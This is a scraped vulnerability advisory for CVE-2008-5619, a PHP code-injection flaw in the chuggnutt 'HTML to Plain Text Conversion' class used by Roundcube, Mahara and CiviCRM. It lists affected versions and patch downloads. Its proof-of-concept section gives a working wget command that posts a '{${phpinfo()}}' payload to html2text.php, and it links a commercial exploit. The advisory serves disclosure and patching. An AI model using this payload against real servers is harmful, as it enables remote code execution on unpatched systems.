chuggnutt.com HTML to Plain Text Conversion Remote Code Execution Vulnerability
BID:32799
Info
chuggnutt.com HTML to Plain Text Conversion Remote Code Execution Vulnerability
| Bugtraq ID: | 32799 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-5619 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 12 2008 12:00AM |
| Updated: | Apr 13 2015 09:37PM |
| Credit: | RealMurphy |
| Vulnerable: |
Ubuntu Ubuntu Linux 8.10 sparc Ubuntu Ubuntu Linux 8.10 powerpc Ubuntu Ubuntu Linux 8.10 lpia Ubuntu Ubuntu Linux 8.10 i386 Ubuntu Ubuntu Linux 8.10 amd64 Ubuntu Ubuntu Linux 8.04 LTS sparc Ubuntu Ubuntu Linux 8.04 LTS powerpc Ubuntu Ubuntu Linux 8.04 LTS lpia Ubuntu Ubuntu Linux 8.04 LTS i386 Ubuntu Ubuntu Linux 8.04 LTS amd64 Roundcube Round Cube Webmail 0.2-3 Beta Roundcube Round Cube Webmail 0.2-1 Alpha Mahara Mahara 1.1.2 Mahara Mahara 1.1.1 CiviCRM CiviCRM 4.3.3 CiviCRM CiviCRM 4.3.2 CiviCRM CiviCRM 4.3.1 CiviCRM CiviCRM 4.3 CiviCRM CiviCRM 4.2.9 CiviCRM CiviCRM 4.2.8 CiviCRM CiviCRM 4.2.7 CiviCRM CiviCRM 4.2.4 CiviCRM CiviCRM 4.2.3 CiviCRM CiviCRM 4.2.2 CiviCRM CiviCRM 4.2.1 CiviCRM CiviCRM 4.2 CiviCRM CiviCRM 4.1 CiviCRM CiviCRM 3.3.3 CiviCRM CiviCRM 2.2 CiviCRM CiviCRM 4.2.6 CiviCRM CiviCRM 4.2.5 CiviCRM CiviCRM 4.1.1 CiviCRM CiviCRM 4.0.5 CiviCRM CiviCRM 3.1 Beta 5 CiviCRM CiviCRM 3.1 Beta 1 chuggnutt.com HTML to Plain Text Conversion 1.0 AtMail Open AtMail Open 1.03 |
| Not Vulnerable: |
Mahara Mahara 1.1.3 CiviCRM CiviCRM 4.3.4 CiviCRM CiviCRM 4.2.10 |
Discussion
chuggnutt.com HTML to Plain Text Conversion Remote Code Execution Vulnerability
The 'HTML to Plain Text Conversion' class from chuggnutt.com is prone to a remote code-execution vulnerability.
Attackers can exploit this issue to inject and execute malicious server-side script in the context of the application using the vulnerable class. Successful exploits will compromise the affected application and possibly the underlying computer.
The issue affects version 1.0 of the class; other versions may also be affected.
NOTE: This issue was initially reported in Roundcube Webmail. Note that RoundCube Webmail 0.2-1 alpha, 0.2-2 beta, and possibly other versions are vulnerable because they use the vulnerable 'HTML to Plain Text Conversion' class.
The 'HTML to Plain Text Conversion' class from chuggnutt.com is prone to a remote code-execution vulnerability.
Attackers can exploit this issue to inject and execute malicious server-side script in the context of the application using the vulnerable class. Successful exploits will compromise the affected application and possibly the underlying computer.
The issue affects version 1.0 of the class; other versions may also be affected.
NOTE: This issue was initially reported in Roundcube Webmail. Note that RoundCube Webmail 0.2-1 alpha, 0.2-2 beta, and possibly other versions are vulnerable because they use the vulnerable 'HTML to Plain Text Conversion' class.
Exploit / POC
chuggnutt.com HTML to Plain Text Conversion Remote Code Execution Vulnerability
Attackers can exploit this issue via a browser.
The following proof of concept is available:
wget -q --header="Content-Type: ''" -O - --post-data='<b>{${phpinfo()}}</b>' --no-check-certificate http://www.example.com/roundcubemail-0.2-alpha/bin/html2text.php
The following commercial exploit is available for Immunity CANVAS:
https://www.immunityinc.com/downloads/immpartners/roundcube.tar.gz
The following exploit is available:
Attackers can exploit this issue via a browser.
The following proof of concept is available:
wget -q --header="Content-Type: ''" -O - --post-data='<b>{${phpinfo()}}</b>' --no-check-certificate http://www.example.com/roundcubemail-0.2-alpha/bin/html2text.php
The following commercial exploit is available for Immunity CANVAS:
https://www.immunityinc.com/downloads/immpartners/roundcube.tar.gz
The following exploit is available:
Solution / Fix
chuggnutt.com HTML to Plain Text Conversion Remote Code Execution Vulnerability
Solution:
Updates are available. Please see the references for more information.
Ubuntu Ubuntu Linux 8.04 LTS powerpc
Ubuntu Ubuntu Linux 8.10 powerpc
Ubuntu Ubuntu Linux 8.10 i386
Ubuntu Ubuntu Linux 8.04 LTS sparc
Ubuntu Ubuntu Linux 8.04 LTS amd64
Ubuntu Ubuntu Linux 8.04 LTS lpia
Ubuntu Ubuntu Linux 8.10 lpia
Ubuntu Ubuntu Linux 8.10 sparc
Ubuntu Ubuntu Linux 8.04 LTS i386
Ubuntu Ubuntu Linux 8.10 amd64
Mahara Mahara 1.1.1
Mahara Mahara 1.1.2
Solution:
Updates are available. Please see the references for more information.
Ubuntu Ubuntu Linux 8.04 LTS powerpc
-
Ubuntu moodle_1.8.2-1ubuntu4.2_all.deb
http://security.ubuntu.com/ubuntu/pool/main/m/moodle/moodle_1.8.2-1ubu ntu4.2_all.deb
Ubuntu Ubuntu Linux 8.10 powerpc
-
Ubuntu moodle_1.8.2-1.2ubuntu2.1_all.deb
http://security.ubuntu.com/ubuntu/pool/main/m/moodle/moodle_1.8.2-1.2u buntu2.1_all.deb
Ubuntu Ubuntu Linux 8.10 i386
-
Ubuntu moodle_1.8.2-1.2ubuntu2.1_all.deb
http://security.ubuntu.com/ubuntu/pool/main/m/moodle/moodle_1.8.2-1.2u buntu2.1_all.deb
Ubuntu Ubuntu Linux 8.04 LTS sparc
-
Ubuntu moodle_1.8.2-1ubuntu4.2_all.deb
http://security.ubuntu.com/ubuntu/pool/main/m/moodle/moodle_1.8.2-1ubu ntu4.2_all.deb
Ubuntu Ubuntu Linux 8.04 LTS amd64
-
Ubuntu moodle_1.8.2-1ubuntu4.2_all.deb
http://security.ubuntu.com/ubuntu/pool/main/m/moodle/moodle_1.8.2-1ubu ntu4.2_all.deb
Ubuntu Ubuntu Linux 8.04 LTS lpia
-
Ubuntu moodle_1.8.2-1ubuntu4.2_all.deb
http://security.ubuntu.com/ubuntu/pool/main/m/moodle/moodle_1.8.2-1ubu ntu4.2_all.deb
Ubuntu Ubuntu Linux 8.10 lpia
-
Ubuntu moodle_1.8.2-1.2ubuntu2.1_all.deb
http://security.ubuntu.com/ubuntu/pool/main/m/moodle/moodle_1.8.2-1.2u buntu2.1_all.deb
Ubuntu Ubuntu Linux 8.10 sparc
-
Ubuntu moodle_1.8.2-1.2ubuntu2.1_all.deb
http://security.ubuntu.com/ubuntu/pool/main/m/moodle/moodle_1.8.2-1.2u buntu2.1_all.deb
Ubuntu Ubuntu Linux 8.04 LTS i386
-
Ubuntu moodle_1.8.2-1ubuntu4.2_all.deb
http://security.ubuntu.com/ubuntu/pool/main/m/moodle/moodle_1.8.2-1ubu ntu4.2_all.deb
Ubuntu Ubuntu Linux 8.10 amd64
-
Ubuntu moodle_1.8.2-1.2ubuntu2.1_all.deb
http://security.ubuntu.com/ubuntu/pool/main/m/moodle/moodle_1.8.2-1.2u buntu2.1_all.deb
Mahara Mahara 1.1.1
-
Mahara mahara-1.1.3.tar.bz2
http://eduforge.org/frs/download.php/968/mahara-1.1.3.tar.bz2
Mahara Mahara 1.1.2
-
Mahara mahara-1.1.3.tar.bz2
http://eduforge.org/frs/download.php/968/mahara-1.1.3.tar.bz2
References
chuggnutt.com HTML to Plain Text Conversion Remote Code Execution Vulnerability
References:
References:
- AtMail Open Homepage (AtMail Open)
- Break-in possiblity via html2text.php (RealMurphy)
- Changeset 2148 (Roundcube)
- PHP Class: HTML to Plain Text Conversion (chuggnutt.com)
- POC for CVE-2008-5619 (roundcubemail PHP arbitrary code injection) (Jacobo Avariento Gimeno
) - Security Announcements - Remote code execution in Mahara 1.1.2 (Mahara)